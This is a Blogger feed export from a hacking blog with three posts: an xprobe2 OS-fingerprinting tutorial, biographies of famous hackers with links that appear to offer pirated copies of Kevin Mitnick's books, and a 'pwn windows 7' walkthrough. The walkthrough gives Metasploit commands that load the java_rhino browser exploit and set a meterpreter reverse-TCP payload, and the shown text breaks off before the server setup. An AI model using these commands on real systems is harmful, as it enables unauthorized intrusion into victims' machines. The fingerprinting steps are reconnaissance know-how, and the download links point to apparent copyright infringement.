tag:blogger.com,1999:blog-58581623306722794982024-03-21T17:27:08.278-04:00Chennai Hackers Connect (CHC)Welcome Hackers!CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.comBlogger197125tag:blogger.com,1999:blog-5858162330672279498.post-40016481131938126562017-12-11T02:21:00.000-05:002017-12-09T12:02:49.182-05:00Banner Grabbing - Backtrack<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="article-header" style="display: table; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; margin: 0px; outline: none; padding: 0px; text-align: center; width: 750px;">
<div style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><span style="color: #333333;"> </span><span style="color: #b4a7d6;">Banner Grabbing - OS Detection </span></span></div>
</div>
<div class="article-content entry-content" itemprop="articleBody" style="clear: both; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 1.4; margin: 10px auto 5px; outline: none; padding: 0px; text-align: justify;">
<div dir="ltr" style="margin: 0px; outline: none; padding: 0px; text-align: left;" trbidi="on">
<br />
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<div style="text-align: left;">
<b><span style="font-family: Arial-BoldMT, sans-serif; font-size: 20pt;"><br /></span></b><b><span style="color: #a2c4c9; font-family: Verdana, sans-serif;">OS Fingerprinting</span></b></div>
<div style="text-align: left;">
<b><span style="color: #a2c4c9; font-family: Verdana, sans-serif;"><br /></span></b></div>
<div style="text-align: left;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif; line-height: 18px;">After we know that the target machine is live, we can then find out the operating system used by the target machine. This method is commonly known as Operating System (OS) fingerprinting.So today i will teach you how you can find which operating system your target is using. </span></div>
</div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3; line-height: 18px;"><br /></span>
</span><br />
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="color: #a2c4c9; line-height: 18px;"><strong>XPROBE 2</strong></span></span></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><span style="color: #a2c4c9; line-height: 18px;"><strong><br /></strong></span></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">xprobe2 is an OS fingerprinting tool. It fingerprints operating systems by using fuzzy signature matching, probabilistic guesses, multiple matches simultaneously, and a signature database. You need to run xprobe2 with root privileges as the xprobe2 uses a raw socket to send the probes.</span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;">To access xprobe2:-</span></div>
<br />
<div style="text-align: left;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">
</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px; text-align: left;">
</div>
<span style="font-family: Verdana, sans-serif;"><br />
</span><br />
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<strong><span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;">1.</span> <span style="color: red;">root@root#</span> <span style="color: lime;">xprobe</span></span></strong></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<strong><span style="font-family: Verdana, sans-serif;"><br /></span></strong></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<strong><span style="color: #f9cb9c; font-family: Verdana, sans-serif;">//run it in ur console and it will open the xprobe usage on ur shell and u can also see which version ur using backtrack 5 r1 is using xprobe2////</span></strong><br />
<strong><span style="color: #f9cb9c; font-family: Verdana, sans-serif;"><br /></span></strong></div>
<div class="separator" style="clear: both; margin: 0px; outline: none; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBCOe6c8Y1tNchcDZLnB5qjRPEXhrY1CjjZ4uqvMUQyEfT1aFJT0IA42fxEVuiAhkdLF_19YEn8NhRR-a7EKByaS3InX3OTU2uhB3j8dAZHIRSM14Xzztcy2wF8UezpxMo8aRIdAuO27MD/s1600/2.bmp" imageanchor="1" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none; transition: color 0.3s;"><span style="font-family: Verdana, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBCOe6c8Y1tNchcDZLnB5qjRPEXhrY1CjjZ4uqvMUQyEfT1aFJT0IA42fxEVuiAhkdLF_19YEn8NhRR-a7EKByaS3InX3OTU2uhB3j8dAZHIRSM14Xzztcy2wF8UezpxMo8aRIdAuO27MD/s1600/2.bmp" style="-webkit-border-image: url(data:image/png; border-image-repeat: stretch; border-image-slice: 9; border-image-source: url(data:image/png; border-image-width: 9px; border: 9px none; box-sizing: border-box; display: inline-block; height: auto; margin: 10px auto; max-width: 100%; padding: 8px; position: relative;"></span></a></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<strong><span style="font-family: Verdana, sans-serif;"><br /></span></strong></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
</div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">Currently, xprobe2 has the following modules:</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• icmp_ping: ICMP echo discovery module</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• tcp_ping: TCP-based ping discovery module</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• udp_ping: UDP-based ping discovery module</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• ttl_calc: TCP and UDP based TTL distance calculation</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• portscan: TCP and UDP PortScanner</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• icmp_echo: ICMP echo request fingerprinting module</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• icmp_tstamp: ICMP timestamp request fingerprinting module</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• icmp_amask: ICMP address mask request fingerprinting module</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• icmp_port_unreach: ICMP port unreachable fingerprinting module</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• tcp_hshake: TCP Handshake fingerprinting module</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• tcp_rst: TCP RST fingerprinting module</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• smb: SMB fingerprinting module</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">• snmp: SNMPv2c fingerprinting module</span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">For fingerprinting a remote machine, you can just call xprobe2 and give the remote machine IP address or hostname as the argument:</span><br />
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<b><span style="color: red; font-family: Verdana, sans-serif; font-size: 16pt;"><br /></span></b></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<b><span style="color: red; font-family: CourierStd-Bold, serif;"><o:p><span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;">2.</span> <span style="color: red;">root@root# </span><span style="color: lime;">xprobe2 192.168.1.4 </span></span></o:p></span></b></div>
<div class="MsoNormal" style="line-height: normal; margin: 0px 0px 0in; outline: none; padding: 0px;">
<b><span style="color: red; font-family: CourierStd-Bold, serif;"><span style="font-family: Verdana, sans-serif;"><br /></span></span></b></div>
<div class="separator" style="clear: both; margin: 0px; outline: none; padding: 0px; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidK7MFK4W7j8hdMtL11uUsErRtmgkvMbxLc6eJnkeY2340vXR7RjJH69KJ_G67NdzpCQFXXpIXjAOwJIfkGEMaOQ2gcoIamKnXRWDXKG6qTT1UWDO6AWx-5ork2KfxD6cJQiNmnSmz0Lot/s1600/1.bmp" imageanchor="1" style="-webkit-transition: color 0.3s; clear: left; color: #009eb8; display: inline; float: left; margin-bottom: 1em; margin-right: 1em; outline: none; transition: color 0.3s;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidK7MFK4W7j8hdMtL11uUsErRtmgkvMbxLc6eJnkeY2340vXR7RjJH69KJ_G67NdzpCQFXXpIXjAOwJIfkGEMaOQ2gcoIamKnXRWDXKG6qTT1UWDO6AWx-5ork2KfxD6cJQiNmnSmz0Lot/s1600/1.bmp" style="-webkit-border-image: url(data:image/png; border-image-repeat: stretch; border-image-slice: 9; border-image-source: url(data:image/png; border-image-width: 9px; border: 9px none; box-sizing: border-box; display: inline-block; height: auto; margin: 10px auto; max-width: 100%; padding: 8px; position: relative;"></a></div>
<div class="separator" style="clear: both; margin: 0px; outline: none; padding: 0px; text-align: left;">
<br /></div>
</div>
</div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com2tag:blogger.com,1999:blog-5858162330672279498.post-53604766311486184842017-11-29T13:40:00.000-05:002017-12-09T12:05:03.018-05:00Top FAMOUS HACKERS<div dir="ltr" style="text-align: left;" trbidi="on">
<h3 class="post-title entry-title" style="color: #6b9913; font-weight: normal; line-height: 1.4em; margin: 0.25em 0px 0px; padding: 0px 0px 4px; text-align: center;">
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: x-large;"><br /></span></h3>
<div style="text-align: center;">
<span style="color: #6aa84f; font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: x-large;">FAMOUS HACKERS ALL TIMES</span></div>
<div class="post-header-line-1" style="font-family: Arial, sans-serif; font-size: 13px;">
</div>
<div class="post-body entry-content" style="line-height: 1.6em; margin: 0px 0px 0.75em;">
<div style="font-family: Arial, sans-serif; font-size: 13px;">
<br /></div>
<div style="font-family: Arial, sans-serif; font-size: 13px;">
<br /></div>
<b><span style="color: #c27ba0; font-family: "arial" , "helvetica" , sans-serif; font-size: large;">KEVIN MITNICK</span></b><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9R6sAE0cHqCUEfKsig7c2BuFxwgq-r50jqH8FIcIqB1LOjLCtwG5fvGnzsuzFrIvBpGzpqWfuQND5eB7HIwgZ3bRM6YcQ1O-weleP5iFesRU-dLdtMA1YwbA-JTfjGoZFQynUz9xmO8k/s1600/kevin_mitnick_gallery_1-ig.jpg" imageanchor="1" style="clear: right; color: black; float: right; margin-bottom: 1em; margin-left: 1em; text-decoration: none;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9R6sAE0cHqCUEfKsig7c2BuFxwgq-r50jqH8FIcIqB1LOjLCtwG5fvGnzsuzFrIvBpGzpqWfuQND5eB7HIwgZ3bRM6YcQ1O-weleP5iFesRU-dLdtMA1YwbA-JTfjGoZFQynUz9xmO8k/s200/kevin_mitnick_gallery_1-ig.jpg" style="border: 1px solid rgb(204, 204, 204); padding: 4px;" width="141" /></span></a><br />
<b style="font-family: Verdana, sans-serif; line-height: 1.6em;"><span style="color: orange;"><br /></span></b>
<b style="font-family: Verdana, sans-serif; line-height: 1.6em;"><span style="color: orange;">BORN</span></b><b style="font-family: Verdana, sans-serif; line-height: 1.6em;"><span style="color: orange;">:-</span> </b><span style="color: #f3f3f3; font-family: "verdana" , sans-serif; line-height: 1.6em;">6 AUGUST 1963 (LOS ANGELES) USA.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><b><span style="color: orange;">CURRENT OCCUPATION</span></b><b><span style="color: orange;">:-</span> </b><span style="color: #f3f3f3;">COMPUTER SECURITY </span>CONSULTANT, AUTHOR.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><span style="color: orange;"><b>WEBSITE</b><b>:-</b></span> <a href="http://www.kevinmitnick.com/" style="color: black; text-decoration: none;" target="_blank"><b style="color: blue;">www.kevinmitnick.com</b></a></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><span style="color: orange;">LIFE SUMMARY :-</span><span style="color: #f3f3f3;">He had a very unhappy childhood as his parents were divorced..He was a shy, lonely, overweight kid who was having problem making friends.His first illegal act was to bypass the punch card system, which allowed him to travel in any bus in LOS ANGELES for free.In high school he was introduced to phreaking, which is a way of studying experimenting and manipulating telecommunication systems, which he used for making free long distance calls.He gained his first unauthorized access in computer networks in 1979 at the age of 16 to the computer network of the company DIGITAL EQUIPMENT CORPORATION. Later he hacked into pacific bell voice mail computer which led to issue of a warrant for his arrest due to which he fled and become a fugitive for two and half year, during this years he broke into the computer networks of many reputed companies, using just a laptop and cloned cellular phone to hide his location, but he did a great mistake of breaking into the computer of security expert tsutomu shimomura, who became determined to find the intruder. with the help of shimomura FBI arrested mitnick on February 15 1995 at an apartment in Raleigh, north Carolina. For his illegal computer exploits he served five years in prison and was released on January 21 2000. He know runs MITNICK SECURITY CONSULTING LLC a computer security consultancy.</span></span><br />
<span style="color: #f3f3f3; font-family: "verdana" , sans-serif;">Names of some famous computer networks hacked by Kevin Mitnick :- FBI, PENTAGON, NOKIA, MOTOROLA, SUN MICROSYSTEMS, FUJITSU SIEMENS.</span><br />
<b><span style="font-family: "verdana" , sans-serif;"><br /></span></b>
<b><span style="color: orange; font-family: "verdana" , sans-serif;">BOOKS AUTHORED </span></b><br />
<span style="color: #f3f3f3; font-family: "verdana" , sans-serif;">THE ART OF DECEPTION :- <a href="http://www.ziddu.com/download/13849368/KevinMitnick-TheArtOfDeception.pdf.html" style="text-decoration: none;" target="_blank">Download</a></span><br />
<span style="color: #f3f3f3; font-family: "verdana" , sans-serif;">THE ART OF INTRUSION :- <a href="http://www.ziddu.com/download/13849403/Kevin.Mitnick.The.Art.of.Intrusion.pdf.html" style="text-decoration: none;" target="_blank">Download</a></span><br />
<span style="color: #f3f3f3; font-family: "verdana" , sans-serif;"><br /></span>
<span style="color: #f3f3f3; font-family: "verdana" , sans-serif;">A movie "takedown" was realesed on the chase of kevin mitnick which was based on the book "takedown" by john markoff and tsutomu shimomura.</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<b><span style="font-family: "verdana" , sans-serif;"><br /></span></b>
<b><span style="color: #c27ba0; font-family: "arial" , "helvetica" , sans-serif; font-size: large;">ADRIAN LAMO </span></b><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPfTKw1fpP9izxKGW6E1P3FqJh2FOt2KHFZobnmdrMVyTDS1tYH1pob7qsCDCe5_eicw70blgKQ9s0Z02GsWfGbJIHyo7jtacLr8JvOolEmFWNNONCMXr6X-15BMZrl-n0VQD6ax3xz68/s1600/adrian-lamo-3.jpg" imageanchor="1" style="clear: right; color: black; float: right; margin-bottom: 1em; margin-left: 1em; text-decoration: none;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPfTKw1fpP9izxKGW6E1P3FqJh2FOt2KHFZobnmdrMVyTDS1tYH1pob7qsCDCe5_eicw70blgKQ9s0Z02GsWfGbJIHyo7jtacLr8JvOolEmFWNNONCMXr6X-15BMZrl-n0VQD6ax3xz68/s200/adrian-lamo-3.jpg" style="border: 1px solid rgb(204, 204, 204); padding: 4px;" width="113" /></span></a><span style="font-family: "verdana" , sans-serif;"><b><span style="color: orange;">BORN</span></b><b><span style="color: orange;">:-</span> </b><span style="color: #f3f3f3;">20 feb 1981 (Boston) USA.</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><b><span style="color: orange;">NICKNAME</span></b><b><span style="color: orange;">:-</span> <span style="color: #f3f3f3;">"</span></b><span style="color: #f3f3f3;">DOCTOR" and "HOMELESS HACKER".</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="color: orange;"><b>CURRENT ACTIVITES</b><b>:-</b></span> <span style="color: #f3f3f3;">THREAT ANALYST AND JOURNALIST.</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="color: #f3f3f3; font-family: "verdana" , sans-serif;">ADRIAN LAMO popularly called "homeless hacker" for his transient lifestyle was a former grey hat hacker.He performed many authorized and unauthorized network vulnerability assessments for several high profile companies and firms.In 2003 he was arrested for hacking into the internal networks of "THE NEW YORK TIMES".Adrian Lamo's style was very different from that of other famous hackers. He did not like most expert hackers have any excellent programing skills or higher education,but his secret of success was his ability to get into the mindset of the architect of that security system and take advantage of mistakes done by them. Recently he was under much criticism from the hacker community for giving authorities information about Bradley Manning( US army soldier under arrest for allegedly leaking us cables to wikileaks).</span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><span style="color: orange;"><b>Popular companies penetrated</b><b> :-</b></span> <span style="color: #f3f3f3;">MICROSOFT, THE NEW YORK TIMES, YAHOO!, LEXIS-NEXIS, MCI WORLDCOM .</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPtBXvVa-HfY5pFfDJxZbauR6_LhQMYl1P0AlZQol-lUHPFvoEYdD_YSavEarmjs6QSOwI51W9msusV6YHNia4LZOOCBGAiJ6KIkArKUsxeRa2b7GRaHR5K4DRkcA81PEQULIaRwsnUXw/s1600/images.jpeg" imageanchor="1" style="clear: right; color: black; float: right; margin-bottom: 1em; margin-left: 1em; text-decoration: none;"><span style="font-family: "verdana" , sans-serif;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPtBXvVa-HfY5pFfDJxZbauR6_LhQMYl1P0AlZQol-lUHPFvoEYdD_YSavEarmjs6QSOwI51W9msusV6YHNia4LZOOCBGAiJ6KIkArKUsxeRa2b7GRaHR5K4DRkcA81PEQULIaRwsnUXw/s200/images.jpeg" style="border: 1px solid rgb(204, 204, 204); padding: 4px;" width="133" /></span></a><b><span style="color: #c27ba0; font-family: "arial" , "helvetica" , sans-serif; font-size: large;">KEVIN POULSEN</span></b><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><span style="color: orange;"><b>Born</b>:-</span> <span style="color: #f3f3f3;">1965 (Pasadena, California)</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="color: orange;"><b>Nickname</b>:-</span> <span style="color: #f3f3f3;">"Dark Dante"</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="color: orange;"><b>Current occupation</b>:-</span> <span style="color: #f3f3f3;">Senior Editor at Wired news.</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="font-family: "verdana" , sans-serif;"><span style="color: orange;"><b>Website</b>:-</span> <a href="http://www.kevinpoulsen.com/" style="color: black; text-decoration: none;" target="_blank"><span style="color: blue;">www.kevinpoulsen.com </span></a></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="color: orange;"><b>Blog</b>:-</span><span style="color: black;"> <a href="http://www.wired.com/threatlevel/" style="color: black; text-decoration: none;" target="_blank"><b style="color: blue;">Threat Level</b></a></span><span style="color: blue;"> </span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br /></span>
<span style="color: #f3f3f3; font-family: "verdana" , sans-serif;">Kevin Poulsen is one of the most famous hackers in the world. His hacking career began at the age of 17 when he hacked into US Defence's ARPANET using his TRS-80 computer. He had a day job, first at Standford Research Institute ( SRI ) and then at Sun Microsystem. Hacking took place mainly during the night. During this days he carried out many high-tech stunts which made him one of the best known cyber criminals. In 1988 Kevin got in trouble with the FBI, when the authorities came to know that he had hacked the database on the federal investigation of Philippine dictator Ferdinand Marcos. FBI got a warrant issued against him, due which he fled underground and became a fugitive. During this run from the authorities he carried out his one of the most well known hack wherein he took over all telephone lines for Los Angeles Radio station KIIS-FM ensuring he would be the 102th caller and win the prize (a Porsche 944 S2). One more interesting incident was, when he was featured on NBS's Unsolved Mysteries. Dramatically when his photo was shown on the show, the show's 1-800 phone lines crashed. He was arrested in 1991 when supermarket employees recognized him. He plead guilty to 7 counts of mail, computer and wire fraud, obstruction of justice, money laundering etc. He was sentenced to 51 months in prison and ordered to pay $56,000 in restitution.</span><br />
<span style="color: #f3f3f3; font-family: "verdana" , sans-serif;"> After being released he worked as a journalist in SecurityFocus, where he enjoyed considerably success in the job. Later he became the senior editor of WiredNews in June 2005 where now currently he is. A biography of Kevin "The Watchman: The Twisted Life and Crimes of Serial Hacker Kevin Poulsen" by Jon Littman was published. </span><br />
<span style="color: #f3f3f3; font-family: "verdana" , sans-serif;"> In October 2006 he again came in lime-light when he released information about his successful search for sex-offenders using Myspace. His work identified 744 registered persons with MySpace profiles, and led to the arrest of one, Andrew Lubrano.</span><br />
<br />
<span style="color: #e69138; font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Note:</span><span style="color: #e06666; font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"> Those are not the top most hackers . They are among the top famous Hackers.</span><br />
<span style="color: #e06666; font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span></div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com1tag:blogger.com,1999:blog-5858162330672279498.post-87559217785107039802017-10-31T17:11:00.000-04:002017-12-09T12:06:37.273-05:00Backtrack java rhino exploit<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: orange; font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: x-large;">Browser Java Rhino exploit Tutorial</span></div>
<div style="text-align: center;">
<span style="color: orange; font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: x-large;"><br /></span></div>
<br style="background-color: transparent; color: #999999; font-family: Tahoma, Geneva, sans-serif; font-size: 12px; line-height: 20px;" />
<span style="color: #f3f3f3; font-family: "verdana" , sans-serif;"><span style="background-color: transparent; line-height: 20px;">we are going to pwn </span><b style="background-color: transparent; line-height: 20px;">windows 7</b><span style="background-color: transparent; line-height: 20px;"> with a </span><span8691123 style="background-color: transparent; line-height: 20px;">java</span8691123><span style="background-color: transparent; line-height: 20px;"> exploit called: JAVA RHINO Exploit. Here i quote from the </span><b style="background-color: transparent; line-height: 20px;">Armitage </b><span style="background-color: transparent; line-height: 20px;">console's description of the exploit:" This module exploits a vulnerability in the Rhino Script Engine that can be used by Java </span><span8691123 style="background-color: transparent; line-height: 20px;">Applet</span8691123><span style="background-color: transparent; line-height: 20px;"> to run an arbitrary code outside of the sandbox" The vulnerability affects version 7 and earlier versions, and should work on any </span><span8691123 style="background-color: transparent; line-height: 20px;">browser</span8691123><span style="background-color: transparent; line-height: 20px;">: firefox, safari, </span><span8691123 style="background-color: transparent; line-height: 20px;">internet explorer</span8691123><span style="background-color: transparent; line-height: 20px;">, </span><span8691123 style="background-color: transparent; line-height: 20px;">google chrome</span8691123><span style="background-color: transparent; line-height: 20px;"> etc...</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; line-height: 20px;"><span style="color: #f3f3f3;">First of all, you have to update the metasploit svn by the custom command </span><span style="color: lime;">#</span></span><span style="background-color: transparent; line-height: 20px;"><span style="border: none; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><span style="color: lime;">msfupdate</span><b style="color: #999999;"> </b></span></span><span style="color: #f3f3f3;"><span style="background-color: transparent; line-height: 20px;">, to make sure that the above exploit is included in your </span><b style="background-color: transparent; line-height: 20px;">Backtrack</b><span style="background-color: transparent; line-height: 20px;"> exploits database. Then run:</span></span></span><br />
<span style="font-family: "verdana" , sans-serif;"><br style="background-color: transparent; color: #999999; line-height: 20px;" /></span>
<span style="background-color: transparent; border: none; color: lime; font-family: "verdana" , sans-serif; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;">#msfconsole</span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; border: none; color: #660000; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><b><br /></b></span><span style="background-color: transparent; color: #f3f3f3; line-height: 20px;">Then use this exploit:</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; border: none; color: #660000; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><b><br /></b></span><span style="color: lime;"><span style="background-color: transparent; line-height: 20px;">#</span><span style="background-color: transparent; border: none; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;">use exploit/multi/browser/java_rhino</span></span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; border: none; color: #660000; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><b><br /></b></span><span style="background-color: transparent; color: #f3f3f3; line-height: 20px;">Next set payload:</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; border: none; color: #660000; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><b><br /></b></span><span style="background-color: transparent; border: none; color: lime; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;">#set payload/java/meterpreter/reverse/tcp</span></span><br />
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; border: none; color: #660000; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><b><br /></b></span><span style="background-color: transparent; color: #999999; line-height: 20px;"></span>
</span><br />
<div class="separator" style="background-color: transparent; clear: both; color: #999999; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK3z9RqOTW6jVNjj0R77ugr_zZ6WkzeHKg1qkRR4L2rFqQv7WYnIDjqfYasSc3-vXLWdNTLuT8D-aWd3V34bRd8iCXkS-L6rMb8yEXYmWYaxgFeSfClLjuPl1jaCemUNg3oow8z5fFu80/s1600/image.png" imageanchor="1" style="border: none; color: #ca2b2b; list-style: none; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none; vertical-align: baseline;"><span style="font-family: "verdana" , sans-serif;"><img alt="backtrack, hacking, windows, metasploit, firefox, penetration testing" border="0" height="369" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK3z9RqOTW6jVNjj0R77ugr_zZ6WkzeHKg1qkRR4L2rFqQv7WYnIDjqfYasSc3-vXLWdNTLuT8D-aWd3V34bRd8iCXkS-L6rMb8yEXYmWYaxgFeSfClLjuPl1jaCemUNg3oow8z5fFu80/s640/image.png" style="border: none; list-style: none; margin: 0px; max-width: 600px; outline: none; padding: 0px; vertical-align: baseline;" title="hacking windows 7" width="640" /></span></a></div>
<span style="font-family: "verdana" , sans-serif;"><span style="background-color: transparent; border: none; color: #660000; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><b><br /></b></span><span style="background-color: transparent; color: #999999; line-height: 20px;"></span><span style="background-color: transparent; border: none; color: #660000; line-height: 20px; list-style: none; margin: 0px; outline: none; padding: 0px; vertical-align: baseline;"><b><br /></b></span><span style="background-color: transparent; color: #999999; line-height: 20px;">At this level, type these commands, the first one is meant to set up the server:</span></span><br />
